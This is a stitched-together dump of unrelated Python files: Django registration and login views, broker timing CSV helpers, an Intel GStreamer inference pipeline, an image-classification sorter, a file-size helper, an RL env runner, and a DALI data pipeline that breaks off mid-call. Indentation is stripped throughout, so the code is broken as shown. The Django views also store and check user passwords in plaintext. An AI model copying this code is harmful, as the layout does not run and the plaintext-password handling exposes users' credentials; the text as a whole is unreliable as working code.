info['avatar'] = u.user_info.avatar
info['current'] = request.siteuser and request.siteuser.id == u.id
return info
users = map(_make_user_info, all_users)
return render_to_response(
'home.html',
{
'users': users,
},
context_instance=RequestContext(request)
)
def register(request):
if request.method == 'GET':
return render_to_response(
'register.html', context_instance=RequestContext(request)
)
def _register():
email = request.POST.get('email', None)
password = request.POST.get('password', None)
if not email or not password:
raise RegisterLoginError("Fill email and password")
if UserAuth.objects.filter(email=email).exists():
raise RegisterLoginError("Email has been taken")
user = UserAuth.objects.create(email=email, password=password)
return user
try:
user = _register()
request.session['uid'] = user.user_id
return HttpResponseRedirect(reverse('register_step_2'))
except RegisterLoginError as e:
return render_to_response(
'register.html',
{'error_msg': e},
context_instance=RequestContext(request)
)
def register_step_2(request):
if not request.siteuser:
return HttpResponseRedirect(reverse('home'))
if request.method == 'GET':
return render_to_response(
'register_step_2.html',
{'email': UserAuth.objects.get(user_id=request.siteuser.id).email},
context_instance=RequestContext(request)
)
def _register_step_2():
username = request.POST.get('username', None)
if not username:
raise RegisterLoginError("Fill in username")
UserInfo.objects.create(user_id=request.siteuser.id, username=username)
try:
_register_step_2()
return HttpResponseRedirect(reverse('home'))
except RegisterLoginError as e:
return render_to_response(
'register_step_2.html',
{
'email': UserAuth.objects.get(user_id=request.siteuser.id).email,
'error_msg': e
},
context_instance=RequestContext(request)
)
def login(request):
if request.siteuser:
# already logged in
return HttpResponseRedirect(reverse('home'))
if request.method == 'GET':
return render_to_response(
'login.html',
context_instance=RequestContext(request)
)
def _login():
email = request.POST.get('email', None)
password = request.POST.get('password', None)
if not email or not password:
raise RegisterLoginError("Fill email and password")
if not UserAuth.objects.filter(email=email, password=password).exists():
raise RegisterLoginError("Invalid account")
user = UserAuth.objects.get(email=email, password=password)
return user
try:
user = _login()
request.session['uid'] = user.user_id
return HttpResponseRedirect(reverse('home'))
except RegisterLoginError as e:
return render_to_response(
'login.html',
{'error_msg': e},
context_instance=RequestContext(request)
)
def logout(request):
try:
del request.session['uid']
except:
pass
finally:
return HttpResponseRedirect(reverse('home'))
def login_error(request):
return HttpResponse("OAuth Failure!")
|
import os.path
from pathlib import Path
from os import fspath
import os.path
import json
import numpy as np
import pandas as pd
def Write_Brokers_Opening_Times(Chart):
    data_path = Path(__file__).resolve().parent.parent.parent / "DATA" / "BROKERS_OPEN_TIMES.csv"
data_path_last = fspath(data_path)
column_names = ["Broker","Symbol", "Period", "OpenTime"]
df = pd.DataFrame(columns=column_names)
df = df.append({"Broker": Chart.Broker,"Symbol": Chart.Symbol, "Period": Chart.Period, "OpenTime": Chart.OpenTimes[-1]}, ignore_index=True)
if os.path.isfile(data_path_last):
df_from_file = pd.read_csv(data_path_last)
frames = [df_from_file, df]
result = pd.concat(frames)
result.to_csv(data_path_last, index=False, header=True)
else:
df.to_csv(data_path_last, index=False, header=True)
def Write_Brokers_Closing_Times(Chart):
    data_path = Path(__file__).resolve().parent.parent.parent / "DATA" / "BROKERS_CLOSE_TIMES.csv"
data_path_last = fspath(data_path)
column_names = ["Broker","Symbol", "Period", "CloseTime"]
df = pd.DataFrame(columns=column_names)
df = df.append({"Broker": Chart.Broker,"Symbol": Chart.Symbol, "Period": Chart.Period, "CloseTime": Chart.ClosingTimes[-1]}, ignore_index=True)
if os.path.isfile(data_path_last):
df_from_file = pd.read_csv(data_path_last)
frames = [df_from_file, df]
result = pd.concat(frames)
result.to_csv(data_path_last, index=False, header=True)
else:
df.to_csv(data_path_last, index=False, header=True)
def Open_Time_To_Existing_Chart(data, Chart):
sub_msg = data.decode('utf8').replace("}{", ", ")
my_json = json.loads(sub_msg)
json.dumps(sub_msg, indent=4, sort_keys=True)
my_json["time_start"] = np.datetime64(my_json["time_start"])
my_json["time_stop"] = np.datetime64(my_json["time_stop"])
diff = my_json["time_stop"] - my_json["time_start"]
diff = diff / np.timedelta64(1, 'ms')
Chart.OpenTimes.append(diff)
Write_Brokers_Opening_Times(Chart)
def Open_Time_To_New_Chart(Chart, path_file):
data_path_last = path_file
if os.path.isfile(data_path_last):
df_from_file = pd.read_csv(data_path_last)
lo=df_from_file.loc[df_from_file['Broker'] == Chart.Broker, 'OpenTime']
if not lo.empty :
li = lo.tolist()
return li
else: return [200]
else:
return [200]
def Close_Time_To_Existing_Chart(data, Chart):
sub_msg = data.decode('utf8').replace("}{", ", ")
my_json = json.loads(sub_msg)
json.dumps(sub_msg, indent=4, sort_keys=True)
my_json["time_start"] = np.datetime64(my_json["time_start"])
my_json["time_stop"] = np.datetime64(my_json["time_stop"])
diff = my_json["time_stop"] - my_json["time_start"]
diff = diff / np.timedelta64(1, 'ms')
    Chart.ClosingTimes.append(diff)
    Write_Brokers_Closing_Times(Chart)
def Close_Time_To_New_Chart(Chart, path_file):
data_path_last = path_file
if os.path.isfile(data_path_last):
df_from_file = pd.read_csv(data_path_last)
lo=df_from_file.loc[df_from_file['Broker'] == Chart.Broker, 'CloseTime']
if not lo.empty :
li = lo.tolist()
return li
else: return [200]
else:
return [200]
def Average_OpenTimes(Chart):
if Chart.OpenTimes:
return (sum(Chart.OpenTimes) / len(Chart.OpenTimes)+max(Chart.OpenTimes))/2
else: return None
def Average_CloseTimes(Chart):
if Chart.ClosingTimes:
return (sum(Chart.ClosingTimes) / len(Chart.ClosingTimes) + max(Chart.ClosingTimes)) / 2
else:
return None
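# Editor's note (illustrative): the averages above blend the mean with the maximum,
# e.g. OpenTimes = [100, 200, 300] ms gives (mean 200 + max 300) / 2 = 250 ms.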
|
'''
* Copyright (C) 2019-2020 Intel Corporation.
*
* SPDX-License-Identifier: BSD-3-Clause
'''
import copy
import json
import os
import string
import time
from threading import Lock, Thread
from collections import namedtuple
import gi
gi.require_version('Gst', '1.0')
gi.require_version('GstApp', '1.0')
# pylint: disable=wrong-import-position
from gi.repository import GLib, Gst, GstApp # pylint: disable=unused-import
from gstgva.util import GVAJSONMeta
from vaserving.app_destination import AppDestination
from vaserving.app_source import AppSource
from vaserving.common.utils import logging
from vaserving.pipeline import Pipeline
from vaserving.rtsp.gstreamer_rtsp_destination import GStreamerRtspDestination # pylint: disable=unused-import
from vaserving.rtsp.gstreamer_rtsp_server import GStreamerRtspServer
# pylint: enable=wrong-import-position
class GStreamerPipeline(Pipeline):
Gst.init(None)
GVA_INFERENCE_ELEMENT_TYPES = ["GstGvaDetect",
"GstGvaClassify",
"GstGvaInference",
"GvaAudioDetect"]
_inference_element_cache = {}
_mainloop = None
_mainloop_thread = None
_rtsp_server = None
CachedElement = namedtuple("CachedElement", ["element", "pipelines"])
@staticmethod
def gobject_mainloop():
GStreamerPipeline._mainloop = GLib.MainLoop.new(None, False)
try:
GStreamerPipeline._mainloop.run()
except (KeyboardInterrupt, SystemExit):
pass
def __init__(self, identifier, config, model_manager, request, finished_callback, options):
# TODO: refactor as abstract interface
# pylint: disable=super-init-not-called
self.config = config
self.identifier = identifier
self.pipeline = None
self.template = config['template']
self.models = model_manager.models
self.model_manager = model_manager
self.request = request
self.state = Pipeline.State.QUEUED
self.frame_count = 0
self.start_time = None
self.stop_time = None
self.avg_fps = 0
self._gst_launch_string = None
self.latency_times = dict()
self.sum_pipeline_latency = 0
self.count_pipeline_latency = 0
self._real_base = None
self._stream_base = None
self._year_base = None
self._month_base = None
self._day_base = None
self._dir_name = None
self._bus_connection_id = None
self._create_delete_lock = Lock()
self._finished_callback = finished_callback
self._bus_messages = False
self.appsrc_element = None
self._app_source = None
self.appsink_element = None
self._app_destinations = []
self._cached_element_keys = []
self._logger = logging.get_logger('GSTPipeline', is_static=True)
self.rtsp_path = None
if (not GStreamerPipeline._mainloop):
GStreamerPipeline._mainloop_thread = Thread(
target=GStreamerPipeline.gobject_mainloop)
GStreamerPipeline._mainloop_thread.daemon = True
GStreamerPipeline._mainloop_thread.start()
if (options.enable_rtsp and not GStreamerPipeline._rtsp_server):
GStreamerPipeline._rtsp_server = GStreamerRtspServer(options.rtsp_port)
GStreamerPipeline._rtsp_server.start()
self.rtsp_server = GStreamerPipeline._rtsp_server
self._verify_and_set_rtsp_destination()
@staticmethod
def mainloop_quit():
if (GStreamerPipeline._rtsp_server):
GStreamerPipeline._rtsp_server.stop()
# Explicit delete frees GstreamerRtspServer resources.
# Avoids hang or segmentation fault on vaserving.stop()
del GStreamerPipeline._rtsp_server
GStreamerPipeline._rtsp_server = None
if (GStreamerPipeline._mainloop):
GStreamerPipeline._mainloop.quit()
GStreamerPipeline._mainloop = None
if (GStreamerPipeline._mainloop_thread):
GStreamerPipeline._mainloop_thread = None
def _verify_and_set_rtsp_destination(self):
destination = self.request.get("destination", {})
frame_destination = destination.get("frame", {})
frame_destination_type = frame_destination.get("type", None)
if frame_destination_type == "rtsp":
if not self.rtsp_server:
raise Exception("Unsupported Frame Destination: RTSP Server isn't enabled")
self.rtsp_path = frame_destination["path"]
if not self.rtsp_path.startswith('/'):
self.rtsp_path = "/" + self.rtsp_path
self.rtsp_server.check_if_path_exists(self.rtsp_path)
frame_destination["class"] = "GStreamerRtspDestination"
rtsp_destination = AppDestination.create_app_destination(self.request, self, "frame")
if not rtsp_destination:
raise Exception("Unsupported Frame Destination: {}".format(
frame_destination["class"]))
self._app_destinations.append(rtsp_destination)
def _delete_pipeline(self, new_state):
self.state = new_state
self.stop_time = time.time()
self._logger.debug("Setting Pipeline {id}"
" State to {next_state}".format(id=self.identifier,
next_state=new_state.name))
if self.pipeline:
bus = self.pipeline.get_bus()
if self._bus_connection_id:
bus.remove_signal_watch()
bus.disconnect(self._bus_connection_id)
self._bus_connection_id = None
self.pipeline.set_state(Gst.State.NULL)
del self.pipeline
self.pipeline = None
if self._app_source:
self._app_source.finish()
for destination in self._app_destinations:
destination.finish()
self._app_destinations.clear()
if (new_state == Pipeline.State.ERROR):
for key in self._cached_element_keys:
for pipeline in GStreamerPipeline._inference_element_cache[key].pipelines:
if (self != pipeline):
pipeline.stop()
del GStreamerPipeline._inference_element_cache[key]
self._finished_callback()
def _delete_pipeline_with_lock(self, new_state):
with(self._create_delete_lock):
self._delete_pipeline(new_state)
def stop(self):
with(self._create_delete_lock):
if not self.state.stopped():
if (self.pipeline):
structure = Gst.Structure.new_empty(self.state.name)
message = Gst.Message.new_custom(
Gst.MessageType.APPLICATION, None, structure)
self.pipeline.get_bus().post(message)
else:
self.state = Pipeline.State.ABORTED
return self.status()
def params(self):
# TODO: refactor
# pylint: disable=R0801
request = copy.deepcopy(self.request)
if "models" in request:
del request["models"]
params_obj = {
"id": self.identifier,
"request": request,
"type": self.config["type"],
"launch_command": self._gst_launch_string
}
return params_obj
def status(self):
self._logger.debug("Called Status")
if self.start_time is not None:
if self.stop_time is not None:
elapsed_time = max(0, self.stop_time - self.start_time)
else:
elapsed_time = max(0, time.time() - self.start_time)
else:
elapsed_time = None
status_obj = {
"id": self.identifier,
"state": self.state,
"avg_fps": self.avg_fps,
"start_time": self.start_time,
"elapsed_time": elapsed_time
}
if self.count_pipeline_latency != 0:
status_obj["avg_pipeline_latency"] = self.sum_pipeline_latency / \
self.count_pipeline_latency
return status_obj
def get_avg_fps(self):
return self.avg_fps
def _get_element_property(self, element, key):
if isinstance(element, str):
return (element, key, None)
if isinstance(element, dict):
return (element["name"], element["property"], element.get("format", None))
return None
def _set_bus_messages_flag(self):
request_parameters, config_parameters = Pipeline.get_section_and_config(
self.request, self.config, ["parameters"],
["parameters", "properties"])
bus_msgs = "bus-messages"
if bus_msgs in config_parameters and bus_msgs in request_parameters and \
isinstance(request_parameters[bus_msgs], bool):
self._bus_messages = request_parameters[bus_msgs]
def _set_section_properties(self, request_section, config_section):
# TODO: refactor
# pylint: disable=R1702
request, config = Pipeline.get_section_and_config(
self.request, self.config, request_section, config_section)
for key in config:
if isinstance(config[key], dict) and "element" in config[key]:
if key in request:
if isinstance(config[key]["element"], list):
element_properties = [self._get_element_property(
x, key) for x in config[key]["element"]]
else:
element_properties = [self._get_element_property(
config[key]["element"], key)]
for element_name, property_name, format_type in element_properties:
element = self.pipeline.get_by_name(element_name)
if element:
if (property_name in [x.name for x in element.list_properties()]):
if (format_type == "json"):
element.set_property(
property_name, json.dumps(request[key]))
else:
element.set_property(
property_name, request[key])
self._logger.debug("Setting element: {}, property: {}, value: {}".format(
element_name,
property_name,
element.get_property(property_name)))
else:
self._logger.debug("Parameter {} given for element {}"
" but no property found".format(
property_name, element_name))
else:
self._logger.debug(
"Parameter {} given for element {}"
" but no element found".format(property_name, element_name))
def _cache_inference_elements(self):
model_instance_id = "model-instance-id"
gva_elements = [(element, element.__gtype__.name + '_'
+ element.get_property(model_instance_id))
for element in self.pipeline.iterate_elements()
if (element.__gtype__.name in self.GVA_INFERENCE_ELEMENT_TYPES
and model_instance_id in [x.name for x in element.list_properties()]
and element.get_property(model_instance_id))]
for element, key in gva_elements:
if key not in GStreamerPipeline._inference_element_cache:
GStreamerPipeline._inference_element_cache[key] = GStreamerPipeline.CachedElement(
element, [])
self._cached_element_keys.append(key)
GStreamerPipeline._inference_element_cache[key].pipelines.append(self)
def _set_default_models(self):
gva_elements = [element for element in self.pipeline.iterate_elements() if (
element.__gtype__.name in self.GVA_INFERENCE_ELEMENT_TYPES and
"VA_DEVICE_DEFAULT" in element.get_property("model"))]
for element in gva_elements:
network = self.model_manager.get_default_network_for_device(
element.get_property("device"), element.get_property("model"))
self._logger.debug("Setting model to {} for element {}".format(
network, element.get_name()))
element.set_property("model", network)
@staticmethod
def _get_elements_by_type(pipeline, type_strings):
return [element for element in pipeline.iterate_elements()
if element.__gtype__.name in type_strings]
def _set_model_proc(self):
gva_elements = [element for element in self.pipeline.iterate_elements() if (
element.__gtype__.name in self.GVA_INFERENCE_ELEMENT_TYPES)]
for element in gva_elements:
if element.get_property("model-proc") is None:
proc = None
if element.get_property("model") in self.model_manager.model_procs:
proc = self.model_manager.model_procs[element.get_property("model")]
if proc is not None:
self._logger.debug("Setting model proc to {} for element {}".format(
proc, element.get_name()))
element.set_property("model-proc", proc)
@staticmethod
def validate_config(config):
template = config["template"]
pipeline = Gst.parse_launch(template)
appsink_elements = GStreamerPipeline._get_elements_by_type(pipeline, ["GstAppSink"])
metaconvert = pipeline.get_by_name("metaconvert")
metapublish = pipeline.get_by_name("destination")
appsrc_elements = GStreamerPipeline._get_elements_by_type(pipeline, ["GstAppSrc"])
logger = logging.get_logger('GSTPipeline', is_static=True)
if (len(appsrc_elements) > 1):
logger.warning("Multiple appsrc elements found")
if len(appsink_elements) != 1:
logger.warning("Missing or multiple appsink elements")
if metaconvert is None:
logger.warning("Missing metaconvert element")
if metapublish is None:
logger.warning("Missing metapublish element")
def calculate_times(self, sample):
buffer = sample.get_buffer()
segment = sample.get_segment()
times = {}
times['segment.time'] = segment.time
times['stream_time'] = segment.to_stream_time(
Gst.Format.TIME, buffer.pts)
return times
def format_location_callback(self,
unused_element,
unused_fragement_id,
sample,
unused_data=None):
times = self.calculate_times(sample)
if (self._real_base is None):
clock = Gst.SystemClock(clock_type=Gst.ClockType.REALTIME)
self._real_base = clock.get_time()
self._stream_base = times["segment.time"]
metaconvert = self.pipeline.get_by_name("metaconvert")
if metaconvert:
if ("tags" not in self.request):
self.request["tags"] = {}
self.request["tags"]["real_base"] = self._real_base
metaconvert.set_property(
"tags", json.dumps(self.request["tags"]))
adjusted_time = self._real_base + \
(times["stream_time"] - self._stream_base)
self._year_base = time.strftime(
"%Y", time.localtime(adjusted_time / 1000000000))
self._month_base = time.strftime(
"%m", time.localtime(adjusted_time / 1000000000))
self._day_base = time.strftime(
"%d", time.localtime(adjusted_time / 1000000000))
template = "{prefix}/{yearbase}/{monthbase}/{daybase}"
self._dir_name = template.format(prefix=self.request["parameters"]["recording_prefix"],
yearbase=self._year_base,
monthbase=self._month_base, daybase=self._day_base)
try:
os.makedirs(self._dir_name)
except FileExistsError:
self._logger.debug("Directory already exists")
template = "{dirname}/{adjustedtime}_{time}.mp4"
return template.format(dirname=self._dir_name,
adjustedtime=adjusted_time,
time=times["stream_time"] - self._stream_base)
def _set_properties(self):
self._set_section_properties(["parameters"],
["parameters", "properties"])
self._set_section_properties(["destination", "metadata"],
["destination", "properties"])
if "destination" in self.request and \
"metadata" in self.request["destination"] and \
"type" in self.request["destination"]["metadata"]:
self._set_section_properties(["destination", "metadata"],
["destination", "metadata",
self.request["destination"]["metadata"]["type"],
"properties"])
self._set_section_properties(["source"],
["source", "properties"])
if "source" in self.request and "type" in self.request["source"]:
self._set_section_properties(["source"],
["source", self.request["source"]["type"], "properties"])
self._set_section_properties([], [])
def _get_any_source(self):
src = self.pipeline.get_by_name("source")
if (not src):
for src in self.pipeline.iterate_sources():
break
return src
def _set_model_instance_id(self):
model_instance_id = "model-instance-id"
gva_elements = [element for element in self.pipeline.iterate_elements()
if (element.__gtype__.name in self.GVA_INFERENCE_ELEMENT_TYPES)
and model_instance_id in [x.name for x in element.list_properties()]
and (element.get_property(model_instance_id) is None)]
for element in gva_elements:
name = element.get_property("name")
instance_id = name + "_" + str(self.identifier)
element.set_property(model_instance_id, instance_id)
def start(self):
self.request["models"] = self.models
self._gst_launch_string = string.Formatter().vformat(
self.template, [], self.request)
with(self._create_delete_lock):
if (self.start_time is not None):
return
self._logger.debug("Starting Pipeline {id}".format(id=self.identifier))
self._logger.debug(self._gst_launch_string)
try:
self.pipeline = Gst.parse_launch(self._gst_launch_string)
self._set_properties()
self._set_bus_messages_flag()
self._set_default_models()
self._set_model_proc()
self._cache_inference_elements()
self._set_model_instance_id()
src = self._get_any_source()
sink = self.pipeline.get_by_name("appsink")
if (not sink):
sink = self.pipeline.get_by_name("sink")
if src and sink:
src_pad = src.get_static_pad("src")
if (src_pad):
src_pad.add_probe(Gst.PadProbeType.BUFFER,
GStreamerPipeline.source_probe_callback, self)
else:
src.connect(
"pad-added", GStreamerPipeline.source_pad_added_callback, self)
sink_pad = sink.get_static_pad("sink")
sink_pad.add_probe(Gst.PadProbeType.BUFFER,
GStreamerPipeline.appsink_probe_callback, self)
bus = self.pipeline.get_bus()
bus.add_signal_watch()
self._bus_connection_id = bus.connect("message", self.bus_call)
splitmuxsink = self.pipeline.get_by_name("splitmuxsink")
self._real_base = None
if (not splitmuxsink is None):
splitmuxsink.connect("format-location-full",
self.format_location_callback,
None)
self._set_application_source()
self._set_application_destination()
self.pipeline.set_state(Gst.State.PLAYING)
self.start_time = time.time()
except Exception as error:
self._logger.error("Error on Pipeline {id}: {err}".format(
id=self.identifier, err=error))
# Context is already within _create_delete_lock
self._delete_pipeline(Pipeline.State.ERROR)
def _set_application_destination(self):
self.appsink_element = None
app_sink_elements = GStreamerPipeline._get_elements_by_type(self.pipeline, ["GstAppSink"])
if (app_sink_elements):
self.appsink_element = app_sink_elements[0]
destination = self.request.get("destination", None)
if destination and "metadata" in destination and destination["metadata"]["type"] == "application":
app_destination = AppDestination.create_app_destination(
self.request, self, "metadata")
if ((not app_destination) or (not self.appsink_element)
or (not self.appsink_element.name == "destination")):
raise Exception("Unsupported Metadata application Destination: {}".format(
destination["metadata"]["class"]))
self._app_destinations.append(app_destination)
if self.appsink_element is not None:
self.appsink_element.set_property("emit-signals", True)
self.appsink_element.set_property('sync', False)
self.avg_fps = 0
if not self._app_destinations:
self.appsink_element.connect("new-sample", self.on_sample)
else:
self.appsink_element.connect("new-sample", self.on_sample_app_destination)
def on_need_data_app_source(self, src, _):
try:
self._app_source.start_frames()
except Exception as error:
self._logger.error("Error on Pipeline {id}: Error in App Source: {err}".format(
id=self.identifier, err=error))
src.post_message(Gst.Message.new_error(src, GLib.GError(),
"AppSource: {}".format(str(error))))
def on_enough_data_app_source(self, src):
try:
self._app_source.pause_frames()
except Exception as error:
self._logger.error("Error on Pipeline {id}: Error in App Source: {err}".format(
id=self.identifier, err=error))
src.post_message(Gst.Message.new_error(src, GLib.GError(),
"AppSource: {}".format(str(error))))
def _set_application_source(self):
self._app_source = None
self.appsrc_element = None
if self.request["source"]["type"] == "application":
appsrc_element = self.pipeline.get_by_name("source")
if (appsrc_element) and (appsrc_element.__gtype__.name == "GstAppSrc"):
self.appsrc_element = appsrc_element
self._app_source = AppSource.create_app_source(self.request, self)
if (not self._app_source) or (not self.appsrc_element):
raise Exception("Unsupported Application Source: {}".format(
self.request["source"]["class"]))
self.appsrc_element.set_property("format", Gst.Format.TIME)
self.appsrc_element.set_property("block", True)
self.appsrc_element.set_property("do-timestamp", True)
self.appsrc_element.set_property("is-live", True)
self.appsrc_element.set_property("emit-signals", True)
self.appsrc_element.connect('need-data', self.on_need_data_app_source)
self.appsrc_element.connect('enough-data', self.on_enough_data_app_source)
@staticmethod
def source_pad_added_callback(unused_element, pad, self):
pad.add_probe(Gst.PadProbeType.BUFFER,
GStreamerPipeline.source_probe_callback, self)
return Gst.FlowReturn.OK
@staticmethod
def source_probe_callback(unused_pad, info, self):
buffer = info.get_buffer()
pts = buffer.pts
self.latency_times[pts] = time.time()
return Gst.PadProbeReturn.OK
@staticmethod
def appsink_probe_callback(unused_pad, info, self):
buffer = info.get_buffer()
pts = buffer.pts
source_time = self.latency_times.pop(pts, -1)
if source_time != -1:
self.sum_pipeline_latency += time.time() - source_time
self.count_pipeline_latency += 1
return Gst.PadProbeReturn.OK
def on_sample_app_destination(self, sink):
self._logger.debug("Received Sample from Pipeline {id}".format(
id=self.identifier))
sample = sink.emit("pull-sample")
try:
for destination in self._app_destinations:
destination.process_frame(sample)
except Exception as error:
self._logger.error("Error on Pipeline {id}: Error in App Destination: {err}".format(
id=self.identifier, err=error))
return Gst.FlowReturn.ERROR
self.frame_count += 1
self.avg_fps = self.frame_count / (time.time() - self.start_time)
return Gst.FlowReturn.OK
def on_sample(self, sink):
self._logger.debug("Received Sample from Pipeline {id}".format(
id=self.identifier))
sample = sink.emit("pull-sample")
try:
buf = sample.get_buffer()
for meta in GVAJSONMeta.iterate(buf):
json_object = json.loads(meta.get_message())
self._logger.debug(json.dumps(json_object))
except Exception as error:
self._logger.error("Error on Pipeline {id}: {err}".format(
id=self.identifier, err=error))
return Gst.FlowReturn.ERROR
self.frame_count += 1
self.avg_fps = self.frame_count / (time.time() - self.start_time)
return Gst.FlowReturn.OK
def bus_call(self, unused_bus, message, unused_data=None):
message_type = message.type
if message_type == Gst.MessageType.APPLICATION:
self._logger.info("Pipeline {id} Aborted".format(id=self.identifier))
self._delete_pipeline_with_lock(Pipeline.State.ABORTED)
if message_type == Gst.MessageType.EOS:
self._logger.info("Pipeline {id} Ended".format(id=self.identifier))
self._delete_pipeline_with_lock(Pipeline.State.COMPLETED)
elif message_type == Gst.MessageType.ERROR:
err, debug = message.parse_error()
self._logger.error(
"Error on Pipeline {id}: {err}: {debug}".format(id=self.identifier,
err=err,
debug=debug))
self._delete_pipeline_with_lock(Pipeline.State.ERROR)
elif message_type == Gst.MessageType.STATE_CHANGED:
old_state, new_state, unused_pending_state = message.parse_state_changed()
if message.src == self.pipeline:
if old_state == Gst.State.PAUSED and new_state == Gst.State.PLAYING:
if self.state is Pipeline.State.ABORTED:
self._delete_pipeline_with_lock(Pipeline.State.ABORTED)
if self.state is Pipeline.State.QUEUED:
self._logger.info(
"Setting Pipeline {id} State to RUNNING".format(id=self.identifier))
self.state = Pipeline.State.RUNNING
else:
if self._bus_messages:
structure = Gst.Message.get_structure(message)
if structure:
self._logger.info("Message header: {name} , Message: {message}".format(
name=Gst.Structure.get_name(structure),
message=Gst.Structure.to_string(structure)))
return True
|
import cv2
import edgeiq
import os
import json
import shutil
"""
Use image classification to sort a batch of images. The
classification labels can be changed by selecting different models.
Different images can be used by updating the files in the *source_images/*
directory.
NOTE: When developing on a remote device, removing
images from the local *source_images/* directory on your dev machine won't remove images
from the device. They can be removed by using the `aai app shell` command and
deleting them from the remote device's *source_images/* directory.
To change the computer vision model, follow this guide:
https://dashboard.alwaysai.co/docs/application_development/changing_the_model.html
NOTE: This app will auto-detect and use an Intel Movidius Neural Compute stick if
present. However, not all models can make use of it!
"""
# Static keys for extracting data from config JSON file
CONFIG_FILE = 'config.json'
CLASSIFIER = 'classifier'
FOUND_FOLDER = 'found_folder'
EMPTY_FOLDER = 'empty_folder'
SOURCE_FOLDER = 'source_folder'
MODEL_ID = 'model_id'
THRESHOLD = 'confidence_level'
TARGETS = 'target_labels'
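# Editor's note: an illustrative config.json layout inferred from the keys above;
# the model id and target labels are placeholders, not values from the source.
# {
#     "found_folder": "output_images/found",
#     "empty_folder": "output_images/not_found",
#     "source_folder": "source_images",
#     "classifier": {
#         "model_id": "<your-classification-model-id>",
#         "confidence_level": 0.5,
#         "target_labels": ["dog", "cat"]
#     }
# }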
def load_json(filepath):
'''
Convenience to check and load a JSON file
'''
if os.path.exists(filepath) is False:
raise Exception(
'app.py: load_json: File at {} does not exist'.format(filepath))
with open(filepath) as data:
return json.load(data)
def main():
# 1. Load configuration data from the alwaysai.app.json file
config = load_json(
CONFIG_FILE)
found_folder = config.get(FOUND_FOLDER, 'output_images/found')
empty_folder = config.get(EMPTY_FOLDER, 'output_images/not_found')
source_folder = config.get(SOURCE_FOLDER, 'source_images')
classifier_config = config.get(CLASSIFIER, None)
# 2. Spin up just the classifier
model_id = classifier_config.get(MODEL_ID)
print('app.py: main(): initializing classifier with model id: {}'.format(
model_id))
classifier = edgeiq.Classification(model_id)
classifier.load(engine=edgeiq.Engine.DNN)
# 3. Loop through all source images
image_paths = sorted(list(edgeiq.list_images(source_folder + '/')))
image_count = len(image_paths)
print("app.py: main: Checking {} images from '{}' folder ...".format(
        image_count, source_folder))
for image_path in image_paths:
# 3a. Load the image to check
image_display = cv2.imread(image_path)
image = image_display.copy()
empty_path = image_path.replace(source_folder, empty_folder)
confidence = classifier_config.get(THRESHOLD)
# 3b. Find all objects the classifier is capable of finding
results = classifier.classify_image(image, confidence)
if len(results.predictions) == 0:
# Nothing found with given confidence level - move to the empty folder
shutil.move(image_path, empty_path)
continue
predictions = results.predictions
# 3c. Filter results by the target labels if specified
targets = classifier_config.get(TARGETS, None)
if targets is not None:
predictions = edgeiq.filter_predictions_by_label(
results.predictions, targets)
if len(predictions) == 0:
                # No detected labels match the target labels - move to the empty folder
shutil.move(image_path, empty_path)
continue
# 3d. At least one target found, move image to found folder
_, filename = os.path.split(image_path)
print('app.py: main: targets found in {}: {}'.format(
filename, predictions))
found_path = image_path.replace(source_folder, found_folder)
shutil.move(image_path, found_path)
# Print info to console upon completion
print("app.py: main: Completed sorting of {} images".format(image_count))
found_images_count = len(
list(edgeiq.list_images(found_folder)))
print("app.py: main: {} images in the output folder".format(
found_images_count))
if __name__ == "__main__":
main()
|
# -----------------------------------------------------------------------------
def readable_file_size(size, suffix="b"):
"""
Return human readable file size.
Arguments:
size : int
suffix : str
Returns:
str
"""
unit_list = ["", "k", "M", "G", "T", "P", "E", "Z"]
for unit in unit_list:
if abs(size) < 1024:
return "%d %s%s" % (size, unit, suffix)
size /= 1024
return "%d %s%s" % (size, "Yi", suffix)
|
import random
from dataclasses import dataclass
import torch
from baselines.common.vec_env.shmem_vec_env import ShmemVecEnv
from iqn.model import IQN
from core.exploration import DecayingEpsilon
@dataclass
class EnvRunner:
envs: ShmemVecEnv
qf: IQN
eps: DecayingEpsilon
device: str
def _act(self, obs):
with torch.no_grad():
a = self.qf.argmax_actions(obs)
for i in range(self.envs.num_envs):
if random.random() < self.eps():
a[i] = self.envs.action_space.sample()
return a
def __iter__(self):
ep_reward, ep_len = [], []
obs = self.envs.reset()
yield {'obs': obs}
while True:
action = self._act(obs)
obs, reward, terminal, infos = self.envs.step(action)
for info in infos:
if 'episode' in info.keys():
ep_reward.append(info['episode']['r'])
ep_len.append(info['episode']['l'])
if len(ep_reward) >= self.envs.num_envs:
ep_info = {
'episode/reward': sum(ep_reward) / len(ep_reward),
'episode/len': sum(ep_len) / len(ep_len),
}
ep_reward.clear(), ep_len.clear()
else:
ep_info = None
yield {'obs': obs, 'action': action.unsqueeze(1), 'reward': reward,
'terminal': terminal, 'ep_info': ep_info}
|
'''
The following codes are from https://github.com/d-li14/mobilenetv2.pytorch
'''
#pylint: disable=E1101,E1102,R0913,R1725,W0201,W0622,C0103,E1120,R0201,E0213
import os
import torch
import numpy as np
import torchvision.datasets as datasets
import torchvision.transforms as transforms
DATA_BACKEND_CHOICES = ['pytorch']
try:
from nvidia.dali.plugin.pytorch import DALIClassificationIterator
from nvidia.dali.pipeline import Pipeline
import nvidia.dali.ops as ops
import nvidia.dali.types as types
DATA_BACKEND_CHOICES.append('dali-gpu')
DATA_BACKEND_CHOICES.append('dali-cpu')
except ImportError:
print("Please install DALI from https://www.github.com/NVIDIA/DALI to run this example.")
class HybridTrainPipe(Pipeline):
"""
Pipeline for training
"""
def __init__(self, batch_size, num_threads, device_id, data_dir, crop, dali_cpu=False):
'''
Init function for training pipeline
:param batch_size: batch size for training
:param num_threads: number of threads to use
:param device_id: device id
:param data_dir: name of data directory
:param crop: shape of cropped image
:param dali_cpu: whether running on cpu or not
'''
super(HybridTrainPipe, self).__init__(batch_size, num_threads, \
device_id, seed = 12 + device_id)
if torch.distributed.is_initialized():
local_rank = torch.distributed.get_rank()
world_size = torch.distributed.get_world_size()
else:
local_rank = 0
world_size = 1
self.input = ops.FileReader(
file_root = data_dir,
shard_id = local_rank,
num_shards = world_size,
random_shuffle = True)
if dali_cpu:
dali_device = "cpu"
self.decode = ops.HostDecoderRandomCrop(device=dali_device, output_type=types.RGB,
random_aspect_ratio=[0.75, 4./3.],
random_area=[0.08, 1.0],
num_attempts=100)
else:
dali_device = "gpu"
# This padding sets the size of the internal nvJPEG buffers to
# be able to handle all images from full-sized ImageNet
# without additional reallocations
self.decode = ops.ImageDecoderRandomCrop(device="mixed", \
output_type=types.RGB, device_memory_padding=211025920, \
host_memory_padding=140544512,
random_aspect_ratio=[0.75, 4./3.],
